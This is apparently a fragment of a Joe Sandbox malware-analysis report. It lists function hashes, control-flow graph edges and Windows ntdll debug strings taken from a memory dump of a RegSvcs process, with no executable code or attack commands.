                                                                                                              • Instruction Fuzzy Hash: 9D5109B6A0025ABFCB14DFA88C8097FF7B8BB48340B54916DE669E7641D774DE0097E0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 657 ecd770-ecd7ab 658 ecd9e7-ecd9ee 657->658 659 ecd7b1-ecd7bb 657->659 658->659 660 ecd9f4-f1932c 658->660 661 f19357 659->661 662 ecd7c1-ecd7ca 659->662 660->659 667 f19332-f19337 660->667 668 f19361-f19370 661->668 662->661 663 ecd7d0-ecd7d3 662->663 665 ecd7d9-ecd7db 663->665 666 ecd9da-ecd9dc 663->666 665->661 669 ecd7e1-ecd7e4 665->669 666->669 671 ecd9e2 666->671 670 ecd927-ecd938 call ef4c30 667->670 672 f1934b-f19354 call f3f290 668->672 669->661 673 ecd7ea-ecd7ed 669->673 671->673 672->661 676 ecd9f9-ecda02 673->676 677 ecd7f3-ecd7f6 673->677 676->677 682 ecda08-f19346 676->682 680 ecd7fc-ecd848 call ecd660 677->680 681 ecda0d-ecda16 677->681 680->670 687 ecd84e-ecd852 680->687 681->680 685 ecda1c 681->685 682->672 685->668 687->670 688 ecd858-ecd85f 687->688 689 ecd865-ecd869 688->689 690 ecd9d1-ecd9d5 688->690 692 ecd870-ecd87a 689->692 691 f19563-f1957b call f3f290 690->691 691->670 692->691 693 ecd880-ecd887 692->693 696 ecd8ed-ecd90d 693->696 697 ecd889-ecd88d 693->697 698 ecd910-ecd913 696->698 699 f19372 697->699 700 ecd893-ecd898 697->700 701 ecd93b-ecd940 698->701 702 ecd915-ecd918 698->702 704 f19379-f1937b 699->704 703 ecd89e-ecd8a5 700->703 700->704 709 f194d3-f194db 701->709 710 ecd946-ecd949 701->710 707 ecd91e-ecd920 702->707 708 f19559-f1955e 702->708 705 ecd8ab-ecd8e3 call ef8250 703->705 706 f193ea-f193ed 703->706 704->703 711 f19381-f193aa 704->711 731 ecd8e5-ecd8e7 705->731 713 f193f1-f19400 call f082c0 706->713 714 ecd971-ecd98c call eca6e0 707->714 715 ecd922 707->715 708->670 716 f194e1-f194e5 709->716 717 ecda21-ecda2f 709->717 710->717 718 ecd94f-ecd952 710->718 711->696 719 f193b0-f193ca call f082c0 711->719 741 f19402-f19410 713->741 742 f19417 713->742 738 f19528-f1952d 714->738 739 ecd992-ecd9ba 714->739 715->670 716->717 726 f194eb-f194f4 716->726 721 ecd954-ecd964 717->721 722 ecda35-ecda3e 717->722 718->702 718->721 719->731 736 f193d0-f193e3 719->736 721->702 727 ecd966-ecd96f 721->727 722->707 728 f19512-f19514 726->728 729 f194f6-f194f9 726->729 727->707 728->717 740 f1951a-f19523 728->740 734 f19503-f19506 729->734 735 f194fb-f19501 729->735 731->696 737 f19420-f19424 731->737 743 f19508-f1950d 734->743 744 f1950f 734->744 735->728 736->719 745 f193e5 736->745 737->696 749 f1942a-f19430 737->749 746 ecd9bc-ecd9be 738->746 747 f19533-f19536 738->747 739->746 740->707 741->713 748 f19412 741->748 742->737 743->740 744->728 745->696 750 f19549-f1954e 746->750 751 ecd9c4-ecd9cb 746->751 747->746 752 f1953c-f19544 747->752 748->696 753 f19432-f1944f 749->753 754 f19457-f19460 749->754 750->670 757 f19554 750->757 751->690 751->692 752->698 753->754 758 f19451-f19454 753->758 755 f19462-f19467 754->755 756 f194a7-f194a9 754->756 755->756 759 f19469-f1946d 755->759 760 f194ab-f194c6 call eb4508 756->760 761 f194cc-f194ce 756->761 757->708 758->754 762 f19475-f194a1 RtlDebugPrintTimes 759->762 763 f1946f-f19473 759->763 760->670 760->761 761->670 762->756 767 f194a3 762->767 763->756 763->762 767->756
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • PR, xrefs: 00F19508
                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F1936B
                                                                                                              • GsHd, xrefs: 00ECD874
                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 00F19341, 00F19366
                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00F19346
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: GsHd$PR$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                              • API String ID: 3446177414-2462212343
                                                                                                              • Opcode ID: 5c7d784fbe73460759d4faa88c0714658b2108298f435092e06ba6fd202276b2
                                                                                                              • Instruction ID: ac10b99c784341f2825d3074cd0f312b381b16c843fb706ea9735c405d963a94
                                                                                                              • Opcode Fuzzy Hash: 5c7d784fbe73460759d4faa88c0714658b2108298f435092e06ba6fd202276b2
                                                                                                              • Instruction Fuzzy Hash: 5FE1A37560C3018FDB14CF14C990BAAB7E5BF88318F14593DF895AB281D7B2D986DB82
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                              • Instruction ID: 6ca888f3e1e92c61a7f066a11b287a4cfe50428dd74d2781bf38d47177cbbaa2
                                                                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                              • Instruction Fuzzy Hash: DA81D270E0528D8EDF289E68C8517FEBBB6AF85354F28625AEA51B72D1C7348C40CB50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 3446177414-1194432280
                                                                                                              • Opcode ID: 9ab1853bccd95d168e3ea04efea6e36ce17f72e13fc8c827ba6535b74d458d5b
                                                                                                              • Instruction ID: c45d344d716ff75f477e1d8b522dbf4a6615feb7d9abc74e7ceb6901d25361cb
                                                                                                              • Opcode Fuzzy Hash: 9ab1853bccd95d168e3ea04efea6e36ce17f72e13fc8c827ba6535b74d458d5b
                                                                                                              • Instruction Fuzzy Hash: 7B813B71D012699BDB35CB94CD45BEEB7B4AF08710F0441EAEA19B7291E7309E81DFA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                              • API String ID: 3446177414-56086060
                                                                                                              • Opcode ID: e9d274ef3c160c07d5c2bec6d5979188117031ce7378c2e1441491f33f1aebf1
                                                                                                              • Instruction ID: ff7521c2f57c560008b0bbb122c4a6e6f2a4e133c640bdef4dd614f1557fd95f
                                                                                                              • Opcode Fuzzy Hash: e9d274ef3c160c07d5c2bec6d5979188117031ce7378c2e1441491f33f1aebf1
                                                                                                              • Instruction Fuzzy Hash: 45414271A04740DFC711DB24C885BAAB7E0EF45338F24806AE4466B3A2CB78ACC5D790
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 00F34899
                                                                                                              • LdrpCheckRedirection, xrefs: 00F3488F
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00F34888
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                              • Opcode ID: bbb97fa1c6872ad794a4c2847dd121d825a6f52aaeaaf3c9a864960709c6f5c8
                                                                                                              • Instruction ID: 688b8281938e8a822a413e2b73f6313b60ee91d8cd90de8253b27b2ecbae9e13
                                                                                                              • Opcode Fuzzy Hash: bbb97fa1c6872ad794a4c2847dd121d825a6f52aaeaaf3c9a864960709c6f5c8
                                                                                                              • Instruction Fuzzy Hash: C4418F72A147519FCB21CF68D840A26BBE5AF4AB70F150669EC99E7361D730FC00EB91
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $$`
                                                                                                              • API String ID: 3446177414-2005972857
                                                                                                              • Opcode ID: b095f992c4f636fbc5acde1823dbed4e46fdf08463e273b418cc7179528d2d0d
                                                                                                              • Instruction ID: 3fbe63e9e0eada36b29cb5134ddaa195ee2b177892ded8ec62ec26418e80b0b2
                                                                                                              • Opcode Fuzzy Hash: b095f992c4f636fbc5acde1823dbed4e46fdf08463e273b418cc7179528d2d0d
                                                                                                              • Instruction Fuzzy Hash: 9D41BFB5E00619ABCF11DF99E880AEEBBB5FF48314F150139E900A7361C7709D15EB90
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                              • API String ID: 3446177414-3526935505
                                                                                                              • Opcode ID: 360ef59dbbfa1f34fc423ee2aa392aee743f1b01508437fe83cdc796f6717b3a
                                                                                                              • Instruction ID: 99522c3af3191865ddd014cc066a57636b51a9aa7ac41bde2d25b6e54d4e4ca7
                                                                                                              • Opcode Fuzzy Hash: 360ef59dbbfa1f34fc423ee2aa392aee743f1b01508437fe83cdc796f6717b3a
                                                                                                              • Instruction Fuzzy Hash: 3E31F931518784DFD722EB28CC0ABE677E4EF02724F145066F44A677A2C7A8ACC5D751
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $
                                                                                                              • API String ID: 3446177414-3993045852
                                                                                                              • Opcode ID: 67a50b98b83db77c3cd806bb6266a485b06cec460ecfd140d46c495ffa9a589b
                                                                                                              • Instruction ID: 8bfd5efe674e2ac0bc11ebba77209d34035c8f444fe36145cd95fae52a87a1b4
                                                                                                              • Opcode Fuzzy Hash: 67a50b98b83db77c3cd806bb6266a485b06cec460ecfd140d46c495ffa9a589b
                                                                                                              • Instruction Fuzzy Hash: 98111E72904618EBCF15AF94EC48AAD7B71FF45760F108525F926672E0CB765E40EF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a55c3ebad1ef3fedff9a0f5793e6a16abedf64912aa2c4bcab1659f0daf8edb2
                                                                                                              • Instruction ID: 116b3a994b2a17f278cac995de3b6b990fb52d15ac0678db1e72ca29af6d4367
                                                                                                              • Opcode Fuzzy Hash: a55c3ebad1ef3fedff9a0f5793e6a16abedf64912aa2c4bcab1659f0daf8edb2
                                                                                                              • Instruction Fuzzy Hash: 9DE1EC71D00608DFCB25CFA9C984AADBBF1FF48314F24556AE546AB362D771A882DF10
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID:
                                                                                                              • API String ID: 3446177414-0
                                                                                                              • Opcode ID: fbc6f4be887edaeb4fc08b5704dd65615b094fcbfc6f8bd96b403b96d7d28028
                                                                                                              • Instruction ID: 7ce43b40185640828d4ac5300f5737bc6e216fbf3927eb06e81d612e71ee8452
                                                                                                              • Opcode Fuzzy Hash: fbc6f4be887edaeb4fc08b5704dd65615b094fcbfc6f8bd96b403b96d7d28028
                                                                                                              • Instruction Fuzzy Hash: ED713272E10229DFDF04CFA4E984AEDBBB5BF48310F14407AE905AB251D734A909DBA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID:
                                                                                                              • API String ID: 3446177414-0
                                                                                                              • Opcode ID: 6de4baff3bdead187fec5e549723f6ab3671370f0e9ab3ecc1c19d5c22358f17
                                                                                                              • Instruction ID: 939f6cbe28962d5d3c5ab51c6e0e8253391d6d8eac5536cab872440808c54012
                                                                                                              • Opcode Fuzzy Hash: 6de4baff3bdead187fec5e549723f6ab3671370f0e9ab3ecc1c19d5c22358f17
                                                                                                              • Instruction Fuzzy Hash: E35101B2E10229DFDF08CF98E845AEDBBB5BF49314F14817AE805AB290D3749909DF54
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 4281723722-0
                                                                                                              • Opcode ID: ba10e8ecca29e6866d805131d8f58915ecafde1015a93584fb93759c241dcca8
                                                                                                              • Instruction ID: 67a17ba6547a79336ad5fae99e6e89f35f749f4b92dde18f2f91fb283945f24b
                                                                                                              • Opcode Fuzzy Hash: ba10e8ecca29e6866d805131d8f58915ecafde1015a93584fb93759c241dcca8
                                                                                                              • Instruction Fuzzy Hash: 7E312975E406299FCF11DFA8E845AADBBF0BB49720F144129E511F7290CB745D00EF54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: df9f844c8a1671741ca1f03edcdc8fff674bbaeb59d462898dbc438f0c035089
                                                                                                              • Instruction ID: eb2277d730123f09918db409ae21eec32cddc1ed013111a662d575c2d43685ad
                                                                                                              • Opcode Fuzzy Hash: df9f844c8a1671741ca1f03edcdc8fff674bbaeb59d462898dbc438f0c035089
                                                                                                              • Instruction Fuzzy Hash: 72326571D04669DFDB21DF64C984BEABBB0BB08304F1050E9E549B7282DBB49E84DF90
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                              • Instruction ID: 81db6938460dfd3b165363760ed3e7ddd34b28e6cad60c084b411811d6755ed0
                                                                                                              • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                              • Instruction Fuzzy Hash: 3391AF71F0820E9BDF24DE69C881ABEB7A1EF44324F64665AEA95F72C0DB309D41C710
